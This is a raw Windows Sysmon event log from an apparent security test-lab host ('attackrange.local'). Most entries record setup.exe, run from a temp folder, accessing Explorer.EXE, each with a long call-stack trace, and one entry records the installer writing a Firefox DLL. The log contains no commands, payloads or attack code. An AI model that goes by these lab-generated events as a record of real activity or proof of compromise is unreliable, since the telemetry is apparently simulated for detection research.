13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\AccessibleMarshal.dll2021-01-18 13:59:52.099 10341000x800000000000000014121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
